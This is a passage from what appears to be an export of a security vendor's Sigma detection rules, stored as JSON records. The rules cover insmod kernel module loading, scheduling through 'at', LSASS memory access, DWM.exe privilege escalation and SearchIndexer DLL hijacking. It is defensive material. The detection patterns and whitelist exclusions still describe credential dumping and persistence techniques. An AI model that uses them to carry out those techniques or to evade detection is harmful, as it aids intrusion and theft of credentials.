https://attack.mitre.org/techniques/T1547/006/\n - https://attack.mitre.org/techniques/T1014/\ndate: 2023/12/15\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1547.006\n - attack.defense_evasion\n - attack.t1014\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Rootkit.Generic\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n # Commands seen in malware:\n # insmod /root/my_malicious_malware.ko\n # insmod -- /root/my_malicious_malware.ko\n selection:\n Image|endswith: '/kmod'\n CommandLine|contains: 'insmod '\n\n # help and version\n exclusion_options_args:\n CommandLine|contains:\n - ' -h'\n - ' -V'\n - ' --help'\n - ' --version'\n\n exclusion_trendmicro:\n CommandLine:\n - 'insmod /opt/ds_agent/*/*.ko'\n - 'insmod /opt/TrendMicro/vls_agent/*/*.ko'\n\n # exclusion_package_manager:\n # TODO: 
Ancestors\n # # Yum\n # Ancestors|startswith: '/usr/bin/bash|/usr/bin/bash|/usr/libexec/platform-python*|/usr/libexec/platform-python*|'\n\n exclusion_kpatch:\n CommandLine:\n - 'insmod /var/lib/kpatch/*/livepatch-*.ko'\n - 'insmod /var/lib/kpatch/*/kpatch-*.ko'\n\n exclusion_symantec:\n CommandLine: '/sbin/insmod /opt/Symantec/autoprotect/.symevrm-custom-*.ko'\n\n exclusion_veeam:\n ProcessGrandparentImage: '/usr/sbin/veeamworker'\n\n exclusion_commvault:\n - ProcessCommandLine: 'insmod /lib/modules/*/kernel/drivers/*.ko'\n ProcessParentImage: '/opt/commvault/ksh'\n - ProcessGrandparentCommandLine: '/bin/bash /opt/commvault/Base/linux_drv.sh -a /opt/commvault/Base cvblk'\n\n exclusion_quadstorvtl:\n ProcessParentCommandLine: '/bin/bash /quadstorvtl/etc/quadstorvtl.init start'\n\n exclusion_yum_update:\n ProcessGrandparentCommandLine|startswith: '/usr/bin/sh /bin/kernel-install '\n\n exclusion_rpm:\n ProcessAncestors|contains: '|/usr/bin/rpm|'\n\n exclusion_veritas:\n ProcessCommandLine|startswith:\n - 'insmod /etc/vx/kernel/'\n - 'insmod /opt/VRTSgab/modules/'\n - 'insmod /opt/VRTSamf/modules/'\n - 'insmod /opt/VRTSvxfen/modules/'\n\n # https://github.com/quic/quic-usb-drivers/tree/master\n exclusion_quic:\n - ProcessParentCommandLine: '/bin/bash ./QcDevDriver.sh install'\n - ProcessCurrentDirectory: '/opt/QTI/QUD/BuildPackage/'\n\n exclusion_intel:\n ProcessCurrentDirectory: '/opt/intel/oneapi/vtune/20??.?/sepdk/src/'\n\n exclusion_aws:\n ProcessCommandLine|contains: 'aws-replication-driver.ko'\n ProcessAncestors|contains: '/aws-replication-installer-init|'\n\n exclusion_checkpoint:\n ProcessAncestors|contains: '|/var/lib/checkpoint/cpla/cpla|'\n\n exclusion_guardicore:\n - ProcessCommandLine: 'insmod /var/lib/guardicore/modules/*/gc-enforcement/*/gc-enforcement.ko'\n - ProcessAncestors|contains: '|/var/lib/guardicore/sbin/gc-agents-service|'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "050e879b-c3c6-421d-8fc1-c03917f620d2",
"rule_name": "Kernel Module Loaded via Insmod",
"rule_description": "Detects the execution of insmod to load a kernel module manually.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nThey extend the functionality of the kernel without the need to reboot the system.\nFor example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.\nAdversaries may modify the kernel to automatically execute programs on system boot.\nIt is recommended to analyze the context around the usage of insmod as well as to analyze the loaded module to look for malicious content or actions.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2025-11-17",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1014",
"attack.t1547.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "051bcdc2-56be-49af-bd6f-1fbac403ab5b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612386Z",
"creation_date": "2026-03-23T11:45:34.612389Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612397Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md#atomic-test-2---at---schedule-a-job",
"https://attack.mitre.org/techniques/T1053/002/"
],
"name": "t1053_002_scheduled_job_at.yml",
"content": "title: Job Creation Scheduled via at\nid: 051bcdc2-56be-49af-bd6f-1fbac403ab5b\ndescription: |\n Detects a scheduled job creation using the 'at' utility.\n Contrary to the 'crontab' command which schedules repetitive commands, the 'at' command schedules tasks that execute once.\n The new job can be found in the /var/spool/cron/atjobs directory.\n Adversaries may abuse the 'at' utility to perform task scheduling for initial or recurring execution of malicious code.\n It is recommended to investigate the process using the utility as well as the scheduled job itself to look for malicious content or actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md#atomic-test-2---at---schedule-a-job\n - https://attack.mitre.org/techniques/T1053/002/\ndate: 2022/12/26\nmodified: 2025/07/29\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.At\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/at'\n - '/batch'\n\n exclusion_not_create:\n CommandLine|contains:\n - ' -l' # lists the user's pending jobs\n - ' -r' # deletes jobs\n - ' -d' # deletes jobs\n\n exclusion_now:\n CommandLine: 'at now'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "051bcdc2-56be-49af-bd6f-1fbac403ab5b",
"rule_name": "Job Creation Scheduled via at",
"rule_description": "Detects a scheduled job creation using the 'at' utility.\nContrary to the 'crontab' command which schedules repetitive commands, the 'at' command schedules tasks that execute once.\nThe new job can be found in the /var/spool/cron/atjobs directory.\nAdversaries may abuse the 'at' utility to perform task scheduling for initial or recurring execution of malicious code.\nIt is recommended to investigate the process using the utility as well as the scheduled job itself to look for malicious content or actions.\n",
"rule_creation_date": "2022-12-26",
"rule_modified_date": "2025-07-29",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "053fc596-ebe0-4ab6-9d82-691fec399375",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295481Z",
"creation_date": "2026-03-23T11:45:35.295485Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295491Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/shadowpad-new-activity-from-the-winnti-group/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_cleared_process_info_open_lsass.yml",
"content": "title: LSASS Accessed by Process Without PE Metadata Information\nid: 053fc596-ebe0-4ab6-9d82-691fec399375\ndescription: |\n Detects the suspicious open of lsass.exe by a process without PE metadata information (original name and internal name).\n This can be indicative of an attempt to dump LSASS' memory for privilege escalation purposes.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n It is recommended to analyze the source process for malicious content, to check its legitimacy and origin and to start memory forensics to determine stolen credentials.\nreferences:\n - https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/shadowpad-new-activity-from-the-winnti-group/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/06/07\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: \"PROCESS_VM_READ\"\n ProcessOriginalFileName: ''\n ProcessInternalName: ''\n ProcessLegalCopyright: '' # too many FP with only OriginalFileame and InternalName not set. Generally, LegalCopyright and/or CompanyName is set\n ProcessImage|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\\\?Recycle.Bin\\'\n\n exclusion_no_info:\n # In case the agent doesn't know the process info.\n ProcessImphash: '00000000000000000000000000000000'\n\n # Lot of softwares (including Microsoft owns one) do read the image path off the PEB. 
(inside _RTL_USER_PROCESS_PARAMETERS)\n # This is usually to grab the proces list.\n exclusion_signed_peb_read:\n ProcessSigned: 'true'\n GrantedAccess:\n - '0x1010'\n - '0x1410'\n exclusion_waptpython:\n # WAPT is an open source management tool in python that is unsigned.\n CallTrace|contains: 'python27.dll'\n ProcessProcessName: 'waptpython.exe'\n GrantedAccess: '0x1410'\n exclusion_trendmicro:\n # Trend Micro have a lot of different apps.\n ProcessSignature: 'Trend Micro, Inc.'\n exclusion_synology:\n # Some of their software use an have expired certificate.\n #CallTrace|contains: 'UsbClientService.exe'\n #ProcessProcessName: 'UsbClientService.exe'\n # seen versions from 2011 without signature or any internal name, and no usbclientservice.exe occurences in the callstack\n ProcessImage: '?:\\Program Files (x86)\\Synology\\Assistant\\UsbClientService.exe'\n #ProcessSignature: 'Synology Inc.'\n GrantedAccess: '0x1410'\n exclusion_dell_sre:\n CallTrace|contains: 'ProcBy.dll'\n ProcessProcessName: 'SRE.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Sutherland Global Services Inc'\n - 'Sutherland Global Services Private Limited'\n GrantedAccess:\n - '0x1fffff'\n - '0x12f4d0'\n exclusion_g:\n CallTrace|contains: 'nfapi.dll'\n ProcessProcessName: 'DnsCloudClientHost64.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'G DATA Software AG'\n - 'G DATA CyberDefense AG'\n GrantedAccess: '0x1f3fff'\n exclusion_conexant_universal_device_install_uninstall:\n CallTrace|contains: 'KUIU.EXE'\n ProcessProcessName: 'KUIU.EXE'\n ProcessSigned: 'true'\n ProcessSignature: 'Conexant Systems, Inc.'\n GrantedAccess: '0x12f4d0'\n exclusion_rsa_net_witness:\n CallTrace|contains: 'NWEAgent.exe'\n ProcessProcessName: 'NWEAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'RSA Security LLC'\n GrantedAccess: '0x1fffff'\n exclusion_adobe_arm:\n ProcessProcessName: 'AdobeARMHelper.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Adobe Systems, Incorporated'\n - 'Adobe Inc.'\n 
exclusion_alibaba_uninstaller:\n ProcessImage|endswith: '\\Uninstall.exe'\n ProcessSignature: 'Alibaba (China) Network Technology Co.,Ltd.'\n GrantedAccess: '0x12f4d0'\n exclusion_iobit_setup:\n ProcessSignature: 'IObit CO., LTD'\n ProcessDescription: 'Setup/Uninstall'\n GrantedAccess: '0x12f4d0'\n exclusion_oxalys_tools:\n ProcessImage|endswith:\n - '\\OXATOOLS.exe'\n - '\\oxatools64.exe'\n ProcessCompany:\n - 'Oxalys Technologies'\n - 'Oxalys'\n ProcessDescription:\n - 'OXATOOLS'\n - 'Oxatools 64'\n ProcessProduct:\n - 'OXATOOLS'\n - 'OXATOOLS64'\n GrantedAccess: '0x1410'\n exclusion_ossec:\n CallTrace|contains|all:\n - 'ossec-agent'\n - 'ossec-agent.exe'\n ProcessProcessName: 'ossec-agent.exe'\n GrantedAccess: '0x1fffff'\n exclusion_wazuh:\n - ProcessImage: '?:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe'\n - ProcessProcessName: 'ossec-agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Wazuh, Inc'\n exclusion_mcafee:\n ProcessProcessName:\n - 'mfeesp.exe'\n - 'mcshield.exe'\n - 'mfefw.exe'\n - 'mfetp.exe'\n - 'VsTskMgr.exe'\n - 'Scan64.exe'\n - 'shstat.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'McAfee, Inc.'\n exclusion_ocssetup:\n ProcessProcessName: 'OcsSetup.exe'\n ProcessDescription: 'OCS Inventory NG Agent'\n exclusion_cyland_pos_service:\n ProcessProcessName: 'PosService.exe'\n ProcessCompany: 'Cylande'\n GrantedAccess: '0x1410'\n exclusion_seiko_epson_escsvc64:\n ProcessProcessName: 'escsvc64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SEIKO EPSON CORPORATION'\n GrantedAccess: '0x101410'\n exclusion_google_update:\n # for instance, ..C:\\Program Files (x86)\\Google\\Temp\\GUM8660.tmp\\goopdate.dll+16b4e..\n # to handle chrome installed in user appdata, match only on google\\temp\n GrantedAccess: '0x1410'\n CallTrace: '*\\Google\\Temp\\GUM????.tmp\\goopdate.dll*'\n exclusion_adobe:\n # C:\\Program Files (x86)\\Adobe\\Adobe Sync\\CoreSync\\customhook\\CoreSyncCustomHook.exe\n # C:\\Program Files (x86)\\Common 
Files\\Adobe\\CoreSyncExtension\\customhook\\CoreSyncCustomHook.exe\n ProcessImage:\n - '?:\\Program Files (x86)\\Adobe\\Adobe Sync\\CoreSync\\\\*'\n - '?:\\Program Files (x86)\\Common Files\\Adobe\\CoreSyncExtension\\\\*'\n\n exclusion_battleeye:\n ProcessImage: '?:\\Program Files (x86)\\Common Files\\BattlEye\\BEService.exe'\n\n exclusion_symantec:\n ProcessImage: '?:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\bin\\SysUtil.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Symantec Corporation'\n\n exclusion_windev_32bits:\n GrantedAccess: '0x1410'\n CallTrace|contains|all:\n # WinDev 26 standard library\n - 'wd260std.DLL'\n # WinDev 26 VM\n - 'wd260vm.DLL'\n\n exclusion_windev_64bits:\n GrantedAccess: '0x1410'\n CallTrace|contains|all:\n # WinDev 26 standard library\n - 'wd260std64.DLL'\n # WinDev 26 VM\n - 'wd260vm64.DLL'\n\n exclusion_easeus:\n ProcessImage:\n - '?:\\Program Files (x86)\\EaseUS\\Todo Backup\\bin\\TodoBackupService.exe'\n - '?:\\Program Files (x86)\\EaseUS\\ENS\\ensserver.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'CHENGDU YIWO Tech Development Co., Ltd.'\n\n exclusion_watchguard:\n ProcessImage: '?:\\Program Files (x86)\\WatchGuard\\WatchGuard Mobile VPN with SSL\\wgsslvpnsrc.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\WatchGuard\\WatchGuard Mobile VPN with SSL\\wgsslvpnsrc.exe'\n\n exclusion_writedescexecutefilename:\n # C:\\Windows\\Temp\\{368361DA-CBF9-4A07-90CB-2CFF91E36DCC}\\WriteDescExecuteFileName.exe\n ProcessImage: '*\\WriteDescExecuteFileName.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Samsung Electronics CO., LTD.'\n GrantedAccess: '0x153b'\n\n exclusion_xerox:\n ProcessImage: '?:\\Xerox\\Docushare\\IDOLServer\\IDOL\\AutonomyIDOLServer.exe'\n CallTrace|contains: '|?:\\Xerox\\Docushare\\IDOLServer\\IDOL\\AutonomyIDOLServer.exe+'\n GrantedAccess: '0x1410'\n\n exclusion_metricbeat:\n ProcessImage: '?:\\Program Files\\Metricbeat\\metricbeat.exe'\n ProcessCompany: ''\n ProcessDescription: 
''\n ProcessProduct: ''\n CallTrace|contains: '|?:\\Program Files\\Metricbeat\\metricbeat.exe+?????'\n GrantedAccess: '0x1010'\n\n exclusion_zabbix:\n ProcessImage|endswith: '\\zabbix_agentd.exe'\n CallTrace|endswith:\n - '\\zabbix_agentd.exe+?????|?:\\Windows\\System32\\kernel32.dll+?????|?:\\Windows\\System32\\ntdll.dll+?????'\n - '\\zabbix_agentd.exe+?????|?:\\Windows\\System32\\kernel32.dll+????|?:\\Windows\\System32\\ntdll.dll+?????'\n - '\\zabbix_agentd.exe+?????'\n GrantedAccess: '0x1410'\n\n exclusion_oracle_rman:\n ProcessImage|endswith: '\\app\\product\\\\*\\dbhome\\bin\\rman.exe'\n\n exclusion_oracle_dll:\n GrantedAccess: '0x1410'\n # d:\\oracle\\product\\12.2.0\\client_1\\bin\\orannzsbb12.dll\n # E:\\oracle\\product\\12.2.0\\cl32\\bin\\orannzsbb12.dll+\n # E:\\Oracle_client19\\product\\19.0.0\\client_1\\bin\\orannzsbb19.dll\n CallTrace|contains:\n - '\\bin\\orannzsbb??.dll'\n - '\\bin\\oracrf??.dll'\n - '\\bin\\oracore??.dll'\n\n exclusion_xampp:\n # C:\\xampp\\xampp-control.exe\n # no PE metadata information so we must use the SHA256\n ProcessSha256: '1400812815452aa93ab1e051b11f8062ace7bc95e50a91cc3479ba64ed847dde'\n\n exclusion_manageengine:\n ProcessImage: '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\appctrl\\bin\\VerifyTrustedFiles.exe'\n\n exclusion_nagios:\n ProcessImage: '?:\\Program Files (x86)\\Nagios\\NCPA\\ncpa_passive.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\Nagios\\NCPA\\python27.dll+'\n\n exclusion_hewlett_packard:\n ProcessImage: '?:\\Program Files (x86)\\Hewlett-Packard\\Library and Tape Tools WebGUI\\bin\\DeviceAnalysisService.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\Hewlett-Packard\\Library and Tape Tools WebGUI\\bin\\DeviceAnalysisService.exe+'\n\n exclusion_streaming_runtime:\n ProcessImage: '?:\\Program Files\\Streaming Runtime Service\\pxr_srs_launcher.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\Hewlett-Packard\\Library and Tape Tools WebGUI\\bin\\DeviceAnalysisService.exe+'\n 
GrantedAccess: '0x1fffff'\n ProcessSigned: 'true'\n ProcessSignature: 'Qingdao Pico Technology Co.,Ltd.'\n\n exclusion_watchguard_2:\n ProcessImage: '?:\\WatchGuard\\wgsslvpnsrc.exe'\n CallTrace|contains: '|?:\\WatchGuard\\wgsslvpnsrc.exe+'\n GrantedAccess: '0x1f3fff'\n ProcessSigned: 'true'\n ProcessSignature: 'WatchGuard Technologies'\n\n exclusion_moneweb:\n ProcessImage|endswith: '\\Moneweb\\GoldenGatesrvmweb_??\\mgr.exe'\n CallTrace|contains: '\\Moneweb\\GoldenGatesrvmweb_??\\mgr.exe+'\n GrantedAccess: '0x1410'\n\n exclusion_equitrac:\n ProcessImage: '?:\\Program Files\\Equitrac\\Shared Services\\Caching\\bin\\sigar_port.exe'\n CallTrace|contains: '?:\\Program Files\\Equitrac\\Shared Services\\Caching\\bin\\sigar.dll'\n\n exclusion_mactype:\n ProcessImage: '?:\\program files\\mactype\\mt64agnt.exe'\n\n exclusion_svc_mgr_alcatel:\n ProcessImage: '?:\\8770\\bin\\svc_mgr.exe'\n\n exclusion_kill_ciril:\n ProcessImage|endswith:\n - '\\ciril\\prod\\util_unix\\kill.exe'\n - '\\ciril\\prod\\util_unix\\pskill.exe'\n - '\\ciril\\prod\\utilitaires\\expl\\kill_processus.exe'\n - '\\ciril\\net\\cgi-bin\\document.exe'\n - '\\ciril\\net\\cgi-bin\\irename.exe'\n - '\\ciril\\net\\cgi-bin\\lirepjfaccpp.exe'\n\n exclusion_hardis_saas:\n ProcessImage: '?:\\hardis\\saas-mgr\\saas-mgr.exe'\n ProcessGrandparentImage: '?:\\Windows\\system32\\services.exe'\n\n exclusion_appdynamics:\n ProcessImage: '?:\\ProgramData\\AppDynamics\\agents\\machineagent\\bin\\MachineAgentService.exe'\n ProcessGrandparentImage: '?:\\Windows\\system32\\services.exe'\n\n exclusion_rufus:\n ProcessProcessName: 'rufus-?.?.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Akeo Consulting'\n GrantedAccess: '0x1450'\n\n exclusion_nokia_vitalsuite:\n ProcessImage|endswith:\n - '\\VSCommon\\Program\\vnStatusKill.exe'\n - '\\VitalNet\\Program\\aggrun.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "053fc596-ebe0-4ab6-9d82-691fec399375",
"rule_name": "LSASS Accessed by Process Without PE Metadata Information",
"rule_description": "Detects the suspicious open of lsass.exe by a process without PE metadata information (original name and internal name).\nThis can be indicative of an attempt to dump LSASS' memory for privilege escalation purposes.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nIt is recommended to analyze the source process for malicious content, to check its legitimacy and origin and to start memory forensics to determine stolen credentials.\n",
"rule_creation_date": "2021-06-07",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0551aa79-1306-43bb-9b6d-df4f7837d107",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596475Z",
"creation_date": "2026-03-23T11:45:34.596485Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596500Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://x.com/dez_/status/1790807116363481415",
"https://securelist.com/cve-2024-30051/112618/",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_dwm_launch_process.yml",
"content": "title: Suspicious Child Process Launched by DWM.exe\nid: 0551aa79-1306-43bb-9b6d-df4f7837d107\ndescription: |\n Detects a suspicious process launched by dwm.exe.\n Adversaries have been observed exploiting vulnerabilities in DWM in order to escalate privileges. As a result of a successful exploitation, the DWM.exe process launches a child process with System privileges.\n It is recommended to check the actions made by the newly created process for suspicious activity.\nreferences:\n - https://x.com/dez_/status/1790807116363481415\n - https://securelist.com/cve-2024-30051/112618/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2024/07/23\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2024-30051\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Exploitation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\dwm.exe'\n\n filter_known_children:\n Image:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\System32\\ISM.exe'\n - '?:\\Windows\\System32\\dwm.exe'\n - '?:\\Windows\\System32\\dgcvideo.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0551aa79-1306-43bb-9b6d-df4f7837d107",
"rule_name": "Suspicious Child Process Launched by DWM.exe",
"rule_description": "Detects a suspicious process launched by dwm.exe.\nAdversaries have been observed exploiting vulnerabilities in DWM in order to escalate privileges. As a result of a successful exploitation, the DWM.exe process launches a child process with System privileges.\nIt is recommended to check the actions made by the newly created process for suspicious activity.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "05797331-a902-41f3-8dd3-3e0f5cc17d73",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595136Z",
"creation_date": "2026-03-23T11:45:34.595139Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595147Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/",
"https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_searchindexer.yml",
"content": "title: DLL Hijacking via SearchIndexer.exe\nid: 05797331-a902-41f3-8dd3-3e0f5cc17d73\ndescription: |\n Detects potential Windows DLL Hijacking via SearchIndexer.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/\n - https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SearchIndexer.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\msftedit.dll'\n - '\\mstracer.dll'\n - '\\msfte.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "05797331-a902-41f3-8dd3-3e0f5cc17d73",
"rule_name": "DLL Hijacking via SearchIndexer.exe",
"rule_description": "Detects potential Windows DLL Hijacking via SearchIndexer.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
